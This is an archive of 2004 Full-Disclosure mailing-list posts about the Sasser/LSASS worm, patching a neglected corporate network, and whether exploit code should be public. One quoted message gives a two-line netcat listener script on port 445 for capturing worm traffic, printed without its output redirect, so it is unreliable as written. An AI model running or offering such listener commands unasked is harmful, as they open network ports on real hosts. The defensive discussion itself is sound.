of you are probably not older then 25yrs old. You hacked your first box when
you were 2 and flunked kindergarten class because your teacher didn't know
C. Man if I could get this list to write a book what a treasure it would be.

I play CounterStrike on hacking servers and it blows me away that some of
these 14yr olds are writing in C+ to code their own hacks. You know what I
did when I was 14? I don't. G.I Joes humping my sister's Barbie's I guess.

|--__--__--
|
|Message: 14
|Date: Mon, 3 May 2004 17:58:04 +0200 (CEST)
|From: youssef ALAOUI [EMAIL PROTECTED]
|To: [EMAIL PROTECTED]
|Subject: [Full-Disclosure] Unpacking Sasser
|
|HI,
|
|You can use PEiD to try to unpack Sasser (http://peid.has.it/)
|
|you can also catch this worm by creating a shell script called catch.sh
|
|catch.sh would contain two lines :
|
|nc -l -p 445  ~/catched.dump$$
|./catch.sh 
|
|then you just have to launch it : ./catch.sh 
|
|that will create files with random names for each incomming connexion to
|port 445 containing a dump of the trafic in your home directory.
|
|Tek Rulez
|
|
|ALAOUI ABDELLAOUI Youssef alias ANALYSTE
|Delegue Promo 2008
|-{Epitech}- European Institute of Technology
|
|
|
|--__--__--
|
|___
|Full-Disclosure mailing list
|[EMAIL PROTECTED]
|http://lists.netsys.com/mailman/listinfo/full-disclosure
|
|
|End of Full-Disclosure Digest

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Full-Disclosure digest, new LSASS - Javier

[RandallM]

Javier,
Boy are you hitting the head on the nail. There I was getting ready to patch
all the machines I could that day (I had posted here about getting help in
that direction a man's gotta patch) and while I had a cd in my hand
getting ready to insert it, up popped the LSASS Vulnerability error and
restart in 60 seconds! Well, I shut it down, booted with no network and
patched and everything came out ok. Whew!

|--__--__--
|
|Message: 4
|Date: Mon, 03 May 2004 10:45:35 +0200
|From: Javier Fernandez-Sanguino [EMAIL PROTECTED]
|Organization: Germinus
|To: Ben Ryan [EMAIL PROTECTED]
|CC: [EMAIL PROTECTED], [EMAIL PROTECTED],
|   [EMAIL PROTECTED]
|Subject: [Full-Disclosure] Re: New LSASS-based worm finally here (Sasser)
|
|Ben Ryan wrote:
|
| As expected, LSASS exploit-based worm seems to have arrived. Fasten
|your
| seatbelts, those unpatched please use the spew bags provided :)
| I hope PSS resolves the issues discussed in KB835732.
|
|What's more disturbing is that this worm has established a new record
|for Microsoft worms [1]. Blaster was the fastest worm (25 days since
|the patch was published to the worm), this one has been even faster
|(17 days for the first variant since the patch was published to the
|worm). Of course, I'm not considering the fact that this issue was
|known, at least to eEye and Microsoft, for over 5 months.
|
|Regards
|
|Javier
|
|[1] Approaching the record of worms in other OS, which, I believe, is
|held by Scalper (10 days from patch to worm). But hey, they could
|browse the source changes for that one.
|
|
|--__--__--
|

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [ Full-Disclosure] A mans got to patch

[RandallM]

thank you
Randall M
 

To my mentors:

Let me first give a short history to my situation. I work for a company that
began 10ys ago with three Mac servers and about 25 Mac workstations. 10
years later they have 34 servers, 345 PC workstations and 60 G4/G5 Macs in 5
locations around the USA.



I have been in the IT area for one and half years. I have worked for this
company for one year. Patching was not done as needed due to the growth and
continuous requirements put on the two Techs. For the last three days I have
seen what I believe to be Agobot exploits (searching on names found in the
registry were said to be associated with such). 

I have been reading this list for about three weeks now. I have become more
aware of dangers that await. Frankly I'm scared to death :) I want to begin
the tedious task of patching the servers and workstation and can think of no
better place then here to get some what I feel would be very expert advice
on doing this in the best fashion.

Our current environment: Moved to AD Domain this year. Have yet a mix member
server environment with some of the NT's still with Explorer 5.5 (I can hear
some here thinking give me your IP! :) ). I have gone through some of the
servers with Microsoft security scanner and with some I simply went to the
update area. Many had never visited there before as the initial visit loads
the scanner engine. The weakness here is norm for the workstations also. 
We do tape backups nightly. Some of our main problems are the programs that
are still used can't be repaired easily, such as, Dynamics. Also some
servers are running programs that we could never place back on because they
had to be sent off to be loaded by the experts of the software companies.
Another example is the web server with is hanging on by a thread. They paid
nearly $175,000 8 years ago for their online presence. That is no longer
supported and we don't know a dam thing about it except to keep it going!

So here you see my need. My guess is that I have to know something of the
risks with certain patches so as not to get myself in trouble loosing
sensitive material and such not to mention my job for pushing for this to be
done. I don't see this as a simple visit to window update. Your advices
would be greatly appreciated. I don't mind say I'm scared to death.

Randall M

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] no more public exploits: just a n00bie view

[RandallM]

Hey,
I have to agree with Borg. I am of course new to your list. I joined it to
learn the what, when and where of security. I must say that when I saw
exploits posted I was a bit taken back. My first thought was Guess I can
expect to see it soon. A question naturally comes; would it show in the
wild had it not been posted. And what percentages of exploits do go in the
wild due to being posted along with the advisory? Then again how can I be
concerned about an advisory if I can't see the effects of the exploit? Of
course, then again, I really have understood little about the code of the
exploit but did a lot on the advisory. Just a n00bie view.

Borg wrote:


Message: 28
Date: Tue, 27 Apr 2004 13:19:44 -0400
From: chris [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] no more public exploits

Heres my two cents :-/

Exploit code is better kept private.
Advisories should be public.

Why?

Because exploit code is not easy to write depending on the bug. And I 
for one sure dont want some 'penetration tester' taking my code and 
plugging it into his automated scanner and collecting the cash. Im far 
to greedy to watch that happen. Sorry.

NON-Disclosure of Exploit code.
Full-Disclosure of Advisories.

As far as the discussion of sysadmins patching on time or not. All I 
will say is this . . .  if they did patch on time there wouldnt be a 
www.zone-h.org.

- borg (ChrisR-)

--__--__--



Borg ended.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1605 - 14 msgs

[RandallM]

Asking for suggestions on best methods, equipment and experience to set up
test lab. I am more then anxious to learn and build my experience

thank you
Randall M


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Full-Disclosure Super Worm

[RandallM]

thank you
Randall M
Willam,
My job is to support sales force using laptops. Also customer service reps.
That silly scanning gets in the way and slows progress! Not only have
they not learned, but don't care! I pull my hair out trying to come up with
ways to support them and protect the network. Any advise welcomed

Randall M.

--__--__--

Message: 8
Date: Sun, 18 Apr 2004 09:33:38 -0400
From: William Warren [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Super Worm

I bet most have not learned from blaster.  Sure a nubmer of users may 
have gotten protected but i bet a majority are not.




End of Full-Disclosure Digest

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html